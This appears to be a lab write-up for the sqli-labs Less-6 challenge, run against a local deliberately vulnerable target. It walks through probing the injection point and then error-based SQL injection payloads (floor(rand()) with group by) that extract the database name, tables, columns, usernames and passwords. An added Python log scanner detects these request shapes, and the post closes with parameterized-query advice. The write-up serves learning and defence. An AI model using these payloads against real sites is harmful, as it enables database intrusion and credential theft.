This challenge is similar to Less-5; only the injection point differs slightly, and the solution method is the same.
Less-5: https://blog.csdn.net/qq_46432288/article/details/109295457
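Determine the injection point:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1 displays correctly: you are in…
http://127.0.0.1/sqli-labs-master/Less-6/?id=1' displays correctly
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" displays an error, with an error message
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" --+ displays correctly
It is quite clear that the original data is passed in as "id". Because errors are echoed back, this challenge is solved with error-based injection. Boolean-based blind injection is too tedious.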
Determine the current database:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat(database(),'/',floor(rand(0)*2))x from information_schema.columns group by x --+
The error output contains security/1, from which we can infer that the database is security.
Get the tables in the security database:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),'/',floor(rand(0)*2))x from information_schema.tables group by x --+
Get the columns of the users table in the security database:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),'/',floor(rand(0)*2))x from information_schema.columns group by x --+
Get the contents of the username column of the users table in the security database:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select username from users limit 0,1),'/',floor(rand(0)*2))x from security.users group by x --+
Get the contents of the password column of the users table in the security database:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select password from users limit 0,1),'/',floor(rand(0)*2))x from security.users group by x --+
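Seen from the defender's side, the requests above leave a recognizable shape in web access logs. The following Python scanner is an added example, not part of the original post; the log lines are constructed samples, and the indicator names and the Apache-style log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Indicators derived from the request shapes in this write-up (names are hypothetical).
INDICATORS = {
    "quote_in_numeric_id": re.compile(r"^\d+\s*[\"']"),
    "trailing_comment": re.compile(r"(--\s+|#\s*)$"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "rand_group_by": re.compile(
        r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\).*\bgroup\s+by\b"),
    "information_schema": re.compile(r"\binformation_schema\s*\."),
}

def normalize(value):
    """Lowercase, drop inline /* */ comments and collapse whitespace runs."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def inspect_line(line):
    """Return {parameter: [indicator names]} for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return {}
    hits = {}
    # parse_qsl percent-decodes the value and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        found = [k for k, rx in INDICATORS.items() if rx.search(normalize(value))]
        if found:
            hits[name] = found
    return hits

def is_error_based_probe(line):
    """True when a parameter carries the rand()/group by duplicate-key shape."""
    return any("rand_group_by" in v for v in inspect_line(line).values())

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli-labs-master/Less-6/?id=1 HTTP/1.1" 200 721',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs-master/Less-6/?id=1%22%20--+ HTTP/1.1" 200 721',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-labs-master/Less-6/?id=1%22%20union%20select%201,count(*),'
    'concat(database(),%27/%27,floor(rand(0)*2))x%20from%20information_schema.columns%20group%20by%20x%20--+ HTTP/1.1" 200 790',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry), is_error_based_probe(entry))
```

Pattern matching of this kind only surfaces the probing; the fix for the injection itself is to bind id as a query parameter and stop echoing database errors to the client.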
To be continued...